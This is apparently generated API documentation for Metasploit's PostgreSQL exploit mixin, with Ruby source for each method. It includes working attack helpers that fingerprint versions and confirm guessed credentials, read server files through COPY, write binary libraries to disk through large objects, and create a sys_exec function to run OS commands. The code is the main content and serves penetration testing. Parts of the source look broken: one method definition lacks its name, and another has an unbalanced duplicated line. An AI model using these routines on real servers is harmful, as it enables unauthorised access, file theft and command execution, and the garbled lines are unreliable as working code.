Module: Msf::Exploit::Remote::Postgres

Includes:
Db::PostgresPR
Defined in:
lib/msf/core/exploit/postgres.rb

Overview

This module exposes methods for querying a remote PostgreSQL service.

Instance Attribute Summary collapse

Datastore accessors collapse

Instance Method Summary collapse

Instance Attribute Details

#postgres_conn::Msf::Db::PostgresPR::Connection


19
20
21
# File 'lib/msf/core/exploit/postgres.rb', line 19

def postgres_conn
  @postgres_conn
end

Instance Method Details

#analyze_auth_error(e) ⇒ Hash

Matches up filename, line number, and routine with a version. These all come from source builds of Postgres. TODO: check in on the binary distros, see if they're different.


250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
# File 'lib/msf/core/exploit/postgres.rb', line 250

def analyze_auth_error(e)
  fname,fline,froutine = e.to_s.split("\t")[3,3]
  fingerprint = "#{fname}:#{fline}:#{froutine}"
  case fingerprint

  # Usually, Postgres is on Linux, so let's use that as a baseline.

  when "Fauth.c:L395:Rauth_failed"          ; return {:preauth => "7.4.26-27"} # Failed (bad db, bad credentials)
  when "Fpostinit.c:L264:RInitPostgres"     ; return {:preauth => "7.4.26-27"} # Failed (bad db, good credentials)
  when "Fauth.c:L452:RClientAuthentication" ; return {:preauth => "7.4.26-27"} # Rejected (maybe good, but not allowed due to pg_hba.conf)

  when "Fauth.c:L400:Rauth_failed"          ; return {:preauth => "8.0.22-23"} # Failed (bad db, bad credentials)
  when "Fpostinit.c:L274:RInitPostgres"     ; return {:preauth => "8.0.22-23"} # Failed (bad db, good credentials)
  when "Fauth.c:L457:RClientAuthentication" ; return {:preauth => "8.0.22-23"} # Rejected (maybe good)

  when "Fauth.c:L337:Rauth_failed"          ; return {:preauth => "8.1.18-19"} # Failed (bad db, bad credentials)
  when "Fpostinit.c:L354:RInitPostgres"     ; return {:preauth => "8.1.18-19"} # Failed (bad db, good credentials)
  when "Fauth.c:L394:RClientAuthentication" ; return {:preauth => "8.1.18-19"} # Rejected (maybe good)

  when "Fauth.c:L414:RClientAuthentication" ; return {:preauth => "8.2.7-1"}   # Failed (bad db, bad credentials) ubuntu 8.04.2
  when "Fauth.c:L362:Rauth_failed"          ; return {:preauth => "8.2.14-15"} # Failed (bad db, bad credentials)
  when "Fpostinit.c:L319:RInitPostgres"     ; return {:preauth => "8.2.14-15"} # Failed (bad db, good credentials)
  when "Fauth.c:L419:RClientAuthentication" ; return {:preauth => "8.2.14-15"} # Rejected (maybe good)

  when "Fauth.c:L1003:Rauth_failed"          ; return {:preauth => "8.3.8"}    # Failed (bad db, bad credentials)
  when "Fpostinit.c:L388:RInitPostgres"      ; return {:preauth => "8.3.8-9"}  # Failed (bad db, good credentials)
  when "Fauth.c:L1060:RClientAuthentication" ; return {:preauth => "8.3.8"}    # Rejected (maybe good)

  when "Fauth.c:L1017:Rauth_failed"          ; return {:preauth => "8.3.9"} # Failed (bad db, bad credentials)
  when "Fauth.c:L1074:RClientAuthentication" ; return {:preauth => "8.3.9"} # Rejected (maybe good, but not allowed due to pg_hba.conf)

  when "Fauth.c:L258:Rauth_failed"          ; return {:preauth => "8.4.1"}   # Failed (bad db, bad credentials)
  when "Fpostinit.c:L422:RInitPostgres"     ; return {:preauth => "8.4.1-2"} # Failed (bad db, good credentials)
  when "Fauth.c:L349:RClientAuthentication" ; return {:preauth => "8.4.1"}   # Rejected (maybe good)

  when "Fauth.c:L273:Rauth_failed"          ; return {:preauth => "8.4.2"} # Failed (bad db, bad credentials)
  when "Fauth.c:L364:RClientAuthentication" ; return {:preauth => "8.4.2"} # Rejected (maybe good)

  when "Fmiscinit.c:L432:RInitializeSessionUserId" ; return {:preauth => "9.1.5"} # Failed (bad db, bad credentials)
  when "Fpostinit.c:L709:RInitPostgres"     ; return {:preauth => "9.1.5"} # Failed (bad db, good credentials)

  when "Fauth.c:L302:Rauth_failed"          ; return {:preauth => "9.1.6"} # Bad password, good database
  when "Fpostinit.c:L718:RInitPostgres"     ; return {:preauth => "9.1.6"} # Good creds, non-existent but allowed database
  when "Fauth.c:L483:RClientAuthentication" ; return {:preauth => "9.1.6"} # Bad user

  # Windows

  when 'F.\src\backend\libpq\auth.c:L273:Rauth_failed'               ; return {:preauth => "8.4.2-Win"} # Failed (bad db, bad credentials)
  when 'F.\src\backend\utils\init\postinit.c:L422:RInitPostgres'     ; return {:preauth => "8.4.2-Win"} # Failed (bad db, good credentials)
  when 'F.\src\backend\libpq\auth.c:L359:RClientAuthentication'      ; return {:preauth => "8.4.2-Win"} # Rejected (maybe good)

  when 'F.\src\backend\libpq\auth.c:L464:RClientAuthentication'      ; return {:preauth => "9.0.3-Win"} # Rejected (not allowed in pg_hba.conf)
  when 'F.\src\backend\libpq\auth.c:L297:Rauth_failed'               ; return {:preauth => "9.0.3-Win"} # Rejected (bad db or bad creds)

  when 'Fsrc\backend\libpq\auth.c:L302:Rauth_failed'                 ; return {:preauth => "9.2.1-Win"} # Rejected (bad db or bad creds)
  when 'Fsrc\backend\utils\init\postinit.c:L717:RInitPostgres'       ; return {:preauth => "9.2.1-Win"} # Failed (bad db, good credentials)
  when 'Fsrc\backend\libpq\auth.c:L479:RClientAuthentication'        ; return {:preauth => "9.2.1-Win"} # Rejected (not allowed in pg_hba.conf)

  # OpenSolaris (thanks Alexander!)

  when 'Fmiscinit.c:L420:' ; return {:preauth => '8.2.6-8.2.13-OpenSolaris'} # Failed (good db, bad credentials)
  when 'Fmiscinit.c:L382:' ; return {:preauth => '8.2.4-OpenSolaris'} # Failed (good db, bad credentials)
  when 'Fpostinit.c:L318:' ; return {:preauth => '8.2.4-8.2.9-OpenSolaris'} # Failed (bad db, bad credentials)
  when 'Fpostinit.c:L319:' ; return {:preauth => '8.2.10-8.2.13-OpenSolaris'} # Failed (bad db, bad credentials)

  else
    return {:unknown => fingerprint}
  end
end

#databaseString

Return the datastore value of the same name


60
# File 'lib/msf/core/exploit/postgres.rb', line 60

def database; datastore['DATABASE']; end

#initialize(info = {}) ⇒ Object

Creates an instance of a PostgreSQL exploit module.


24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
# File 'lib/msf/core/exploit/postgres.rb', line 24

def initialize(info = {})
  super

  # Register the options that all Postgres exploits may make use of.
  register_options(
    [
      Opt::RHOST,
      Opt::RPORT(5432),
      OptString.new('DATABASE', [ true, 'The database to authenticate against', 'template1']),
      OptString.new('USERNAME', [ true, 'The username to authenticate as', 'postgres']),
      OptString.new('PASSWORD', [ false, 'The password for the specified username. Leave blank for a random password.', '']),
      OptBool.new('VERBOSE', [false, 'Enable verbose output', false]),
      OptString.new('SQL', [ false, 'The SQL query to execute',  'select version()']),
      OptBool.new('RETURN_ROWSET', [false, "Set to true to see query result sets", true])
    ], Msf::Exploit::Remote::Postgres)

  register_autofilter_ports([ 5432 ])
  register_autofilter_services(%W{ postgres })
end

#passwordString

Return the datastore value of the same name


57
# File 'lib/msf/core/exploit/postgres.rb', line 57

def password; datastore['PASSWORD']; end

#postgres_authed_fingerprintHash

Ask the server what its version is


237
238
239
240
241
# File 'lib/msf/core/exploit/postgres.rb', line 237

def postgres_authed_fingerprint
  resp = postgres_query("select version()",false)
  ver = resp[:complete].rows[0][0]
  return {:auth => ver}
end

#postgres_base64_data(data) ⇒ String

Converts data to base64 with no newlines


478
479
480
# File 'lib/msf/core/exploit/postgres.rb', line 478

def postgres_base64_data(data)
  [data].pack("m*").gsub(/\r?\n/,"")
end

#postgres_base64_file(fname) ⇒ String

Calls #postgres_base64_data with the contents of file fname


468
469
470
471
# File 'lib/msf/core/exploit/postgres.rb', line 468

def postgres_base64_file(fname)
  data = File.open(fname, "rb") {|f| f.read f.stat.size}
  postgres_base64_data(data)
end

#postgres_create_stager_tableObject

Deprecated.

No longer necessary since we can insert base64 data directly

Creates a temporary table to store base64'ed binary data in.


486
487
488
489
490
491
492
493
494
495
# File 'lib/msf/core/exploit/postgres.rb', line 486

def postgres_create_stager_table
  tbl = Rex::Text.rand_text_alpha(8).downcase
  fld = Rex::Text.rand_text_alpha(8).downcase
  resp = postgres_query("create temporary table #{tbl}(#{fld} text)")
  if resp[:sql_error]
    print_error resp[:sql_error]
    return false
  end
  return [tbl,fld]
end

#postgres_create_sys_exec(dll) ⇒ Object

Deprecated.

Just get a real shell instead

Creates the function sys_exec() in the pg_temp schema.


360
361
362
363
364
365
366
367
368
# File 'lib/msf/core/exploit/postgres.rb', line 360

def postgres_create_sys_exec(dll)
  q = "create or replace function pg_temp.sys_exec(text) returns int4 as '#{dll}', 'sys_exec' language c returns null on null input immutable"
  resp = postgres_query(q);
  if resp[:sql_error]
    print_error "Error creating pg_temp.sys_exec: #{resp[:sql_error]}"
    return false
  end
  return true
end

#postgres_fingerprint(args = {}) ⇒ Hash

Attempts to fingerprint a remote PostgreSQL instance, inferring version number from the failed authentication messages or simply returning the result of “select version()” if authentication was successful.


210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
# File 'lib/msf/core/exploit/postgres.rb', line 210

def postgres_fingerprint(args={})
  return postgres_authed_fingerprint if self.postgres_conn
  db = args[:database]       || datastore['DATABASE']
  username = args[:username] || datastore['USERNAME']
  password = args[:password] || datastore['PASSWORD']
  rhost = args[:server]      || datastore['RHOST']
  rport = args[:port]        || datastore['RPORT']

  uri = "tcp://#{rhost}:#{rport}"
  if Rex::Socket.is_ipv6?(rhost)
    uri = "tcp://[#{rhost}]:#{rport}"
  end

  verbose = args[:verbose]   || datastore['VERBOSE']
  begin
    self.postgres_conn = Connection.new(db,username,password,uri)
  rescue RuntimeError => e
    version_hash = analyze_auth_error e
    return version_hash
  end
  return postgres_authed_fingerprint if self.postgres_conn
end

#postgres_has_database_privilege(priv) ⇒ Boolean


348
349
350
351
352
353
354
355
356
# File 'lib/msf/core/exploit/postgres.rb', line 348

def postgres_has_database_privilege(priv)
  sql = %Q{select has_database_privilege(current_user,current_database(),'#{priv}')}
  ret = postgres_query(sql,false)
  if ret.keys[0] == :complete
    ret.values[0].rows[0][0].inspect =~ /t/i ? true : false
  else
    return false
  end
end

#postgres_login(opts = {}) ⇒ :error_database, ...

Note:

This method will first call #postgres_logout if the module is already connected.

Takes a number of arguments (defaults to the datastore for appropriate values), and will either populate #postgres_conn and return :connected, or will return :error, :error_databse, or :error_credentials in case of an error.

Fun fact: if you get :error_database, it means your username and password was accepted (you just failed to guess a correct running database instance).

Options Hash (opts):

  • :database (String)

    The database

  • :username (String)

    The username

  • :username (String)

    The username

  • :server (String)

    IP address or hostname of the target server

  • :port (Fixnum)

    TCP port on :server


90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
# File 'lib/msf/core/exploit/postgres.rb', line 90

def (opts={})
  postgres_logout if self.postgres_conn
  db = opts[:database]       || datastore['DATABASE']
  username = opts[:username] || datastore['USERNAME']
  password = opts[:password] || datastore['PASSWORD']
  ip = opts[:server]         || datastore['RHOST']
  port = opts[:port]         || datastore['RPORT']
  uri = "tcp://#{ip}:#{port}"

  if Rex::Socket.is_ipv6?(ip)
    uri = "tcp://[#{ip}]:#{port}"
  end

  verbose = opts[:verbose]   || datastore['VERBOSE']
  begin
    self.postgres_conn = Connection.new(db,username,password,uri)
  rescue RuntimeError => e
    case e.to_s.split("\t")[1]
    when "C3D000"
      print_status "#{ip}:#{port} Postgres - Invalid database: #{db} (Credentials '#{username}:#{password}' are OK)" if verbose
      return :error_database # Note this means the user:pass is good!
    when "C28000", "C28P01"
      print_error "#{ip}:#{port} Postgres - Invalid username or password: '#{username}':'#{password}'" if verbose
      return :error_credentials
    else
      print_error "#{ip}:#{port} Postgres - Error: #{e.inspect}" if verbose
      return :error
    end
  end
  if self.postgres_conn
    print_good "#{ip}:#{port} Postgres - Logged in to '#{db}' with '#{username}':'#{password}'" if verbose
    return :connected
  end
end

#postgres_logoutvoid

This method returns an undefined value.

Logs out of a database instance and sets #postgres_conn to nil


128
129
130
131
132
133
134
135
136
137
# File 'lib/msf/core/exploit/postgres.rb', line 128

def postgres_logout
  ip = datastore['RHOST']
  port = datastore['RPORT']
  verbose = datastore['VERBOSE']
  if self.postgres_conn
    self.postgres_conn.close if(self.postgres_conn.kind_of?(Connection) && self.postgres_conn.instance_variable_get("@conn"))
    self.postgres_conn = nil
  end
  print_status "#{ip}:#{port} Postgres - Disconnected" if verbose
end

#postgres_passwordString


322
323
324
325
326
327
328
# File 'lib/msf/core/exploit/postgres.rb', line 322

def postgres_password
  if datastore['PASSWORD'].to_s.size > 0
    datastore['PASSWORD'].to_s
  else
    'INVALID_' + Rex::Text.rand_text_alpha(rand(6) + 1)
  end
end

#postgres_print_reply(resp = nil, sql = nil) ⇒ Object

If resp is not actually a Connection::Result object, then return :error (but not an actual Exception, that's up to the caller. Otherwise, create a rowset using Rex::Ui::Text::Table (if there's more than 0 rows) and return :complete.


182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
# File 'lib/msf/core/exploit/postgres.rb', line 182

def postgres_print_reply(resp=nil,sql=nil)
  ip = datastore['RHOST']
  port = datastore['RPORT']
  verbose = datastore['VERBOSE']
  return :error unless resp.kind_of? Connection::Result
  if resp.rows and resp.fields
    print_status "#{ip}:#{port} Rows Returned: #{resp.rows.size}" if verbose
    if resp.rows.size > 0
      tbl = Rex::Ui::Text::Table.new(
        'Indent' => 4,
        'Header' => "Query Text: '#{sql}'",
        'Columns' => resp.fields.map {|x| x.name}
      )
      resp.rows.each {|row| tbl << row.map { |x| x.nil? ? "NIL" : x } }
      print_line(tbl.to_s)
    end
  end
  return :complete
end

#postgres_query(sql = nil, doprint = false) ⇒ Hash

If not currently connected, attempt to connect. If an error is encountered while executing the query, it will return with :error ; otherwise, it will return with :complete.


146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
# File 'lib/msf/core/exploit/postgres.rb', line 146

def postgres_query(sql=nil,doprint=false)
  ip = datastore['RHOST']
  port = datastore['RPORT']
   unless self.postgres_conn
  unless self.postgres_conn
    return {:conn_error => true}
  end
  if self.postgres_conn
    sql ||= datastore['SQL']
    vprint_status "#{ip}:#{port} Postgres - querying with '#{sql}'"
    begin
      resp = self.postgres_conn.query(sql)
    rescue RuntimeError => e
      case sql_error_msg = e.to_s.split("\t")[1] # Deal with some common errors
      when "C42601"
        sql_error_msg += " Invalid SQL Syntax: '#{sql}'"
      when "C42P01"
        sql_error_msg += " Table does not exist: '#{sql}'"
      when "C42703"
        sql_error_msg += " Column does not exist: '#{sql}'"
      when "C42883"
        sql_error_msg += " Function does not exist: '#{sql}'"
      else # Let the user figure out the rest.
        sql_error_msg += " SQL statement '#{sql}' returns #{e.inspect}"
      end
      return {:sql_error => sql_error_msg}
    end
    postgres_print_reply(resp,sql) if doprint
    return {:complete => resp}
  end
end

#postgres_read_textfile(filename) ⇒ Object

This presumes the user has rights to both the file and to create a table. If not, #postgres_query will return an error (usually :sql_error), and it should be dealt with by the caller.


333
334
335
336
337
338
339
340
341
342
343
344
# File 'lib/msf/core/exploit/postgres.rb', line 333

def postgres_read_textfile(filename)
  # Check for temp table creation privs first.
  unless postgres_has_database_privilege('TEMP')
    return({:sql_error => "Insufficent privileges for #{datastore['USERNAME']} on #{datastore['DATABASE']}"})
  end

  temp_table_name = Rex::Text.rand_text_alpha(rand(10)+6)
  read_query = %Q{CREATE TEMP TABLE #{temp_table_name} (INPUT TEXT);
    COPY #{temp_table_name} FROM '#{filename}';
    SELECT * FROM #{temp_table_name}}
  return postgres_query(read_query,true)
end

#postgres_sys_exec(cmd) ⇒ Object

Deprecated.

Just get a real shell instead

This presumes the pg_temp.sys_exec() udf has been installed, almost certainly by postgres_create_sys_exec()


374
375
376
377
378
379
380
381
382
383
# File 'lib/msf/core/exploit/postgres.rb', line 374

def postgres_sys_exec(cmd)
  print_status "Attempting to Execute: #{cmd}"
  q = "select pg_temp.sys_exec('#{cmd}')"
  resp = postgres_query(q)
  if resp[:sql_error]
    print_error resp[:sql_error]
    return false
  end
  return true
end

#postgres_upload_binary_data(data, remote_fname = nil) ⇒ nil, String

Writes data to disk on the target server.

This is accomplished in 5 steps:

  1. Create a new object with “select lo_create(-1)”

  2. Delete any resulting rows in pg_largeobject table. On 8.x and older, postgres inserts rows as a result of the call to lo_create. Deleting them here approximates the state on 9.x where no such insert happens.

  3. Break the data into LOBLOCKSIZE-byte chunks.

  4. Insert each of the chunks as a row in pg_largeobject

  5. Select lo_export to write the file to disk


415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
# File 'lib/msf/core/exploit/postgres.rb', line 415

def postgres_upload_binary_data(data, remote_fname=nil)
  remote_fname ||= Rex::Text::rand_text_alpha(8) + ".dll"

  # From the Postgres documentation:
  #   SELECT lo_creat(-1);       -- returns OID of new, empty large object
  # Doing it this way instead of calling lo_create with a random number
  # ensures that we don't accidentally hit the id of a real object.
  resp = postgres_query "select lo_creat(-1)"
  unless resp and resp[:complete] and resp[:complete].rows[0]
    print_error "Failed to get a new loid"
    return
  end

  oid = resp[:complete].rows[0][0].to_i

  queries = [ "delete from pg_largeobject where loid=#{oid}" ]

  # Break the data into smaller chunks that can fit in the size allowed in
  # the pg_largeobject data column.
  # From the postgres documentation:
  #   "The amount of data per page is defined to be LOBLKSIZE (which is
  #   currently BLCKSZ/4, or typically 2 kB)."
  # Empirically, it seems that 8kB is fine on 9.x, but we play it safe and
  # stick to 2kB.
  chunks = []
  while ((c = data.slice!(0..2047)) && c.length > 0)
    chunks.push c
  end

  chunks.each_with_index do |chunk, pageno|
    b64_data = postgres_base64_data(chunk)
    insert = "insert into pg_largeobject (loid,pageno,data) values(%d, %d, decode('%s', 'base64'))"
    queries.push( "#{insert}"%[oid, pageno, b64_data] )
  end
  queries.push "select lo_export(#{oid}, '#{remote_fname}')"

  # Now run each of the queries we just built
  queries.each do |q|
    resp = postgres_query(q)
    if resp && resp[:sql_error]
      print_error "Could not write the library to disk."
      print_error resp[:sql_error]
      # Can't really recover from this, bail
      return nil
    end
  end
  return remote_fname
end

#postgres_upload_binary_file(fname, remote_fname = nil) ⇒ nil, String

Uploads the given local file to the remote server


392
393
394
395
# File 'lib/msf/core/exploit/postgres.rb', line 392

def postgres_upload_binary_file(fname, remote_fname=nil)
  data = File.read(fname)
  postgres_upload_binary_data(data, remote_fname)
end

#rhostString

Return the datastore value of the same name


48
# File 'lib/msf/core/exploit/postgres.rb', line 48

def rhost; datastore['RHOST']; end

#rportFixnum

Return the datastore value of the same name


51
# File 'lib/msf/core/exploit/postgres.rb', line 51

def rport; datastore['RPORT']; end

#usernameString

Return the datastore value of the same name


54
# File 'lib/msf/core/exploit/postgres.rb', line 54

def username; datastore['USERNAME']; end

#verboseBoolean

Return the datastore value of the same name


63
# File 'lib/msf/core/exploit/postgres.rb', line 63

def verbose; datastore['VERBOSE']; end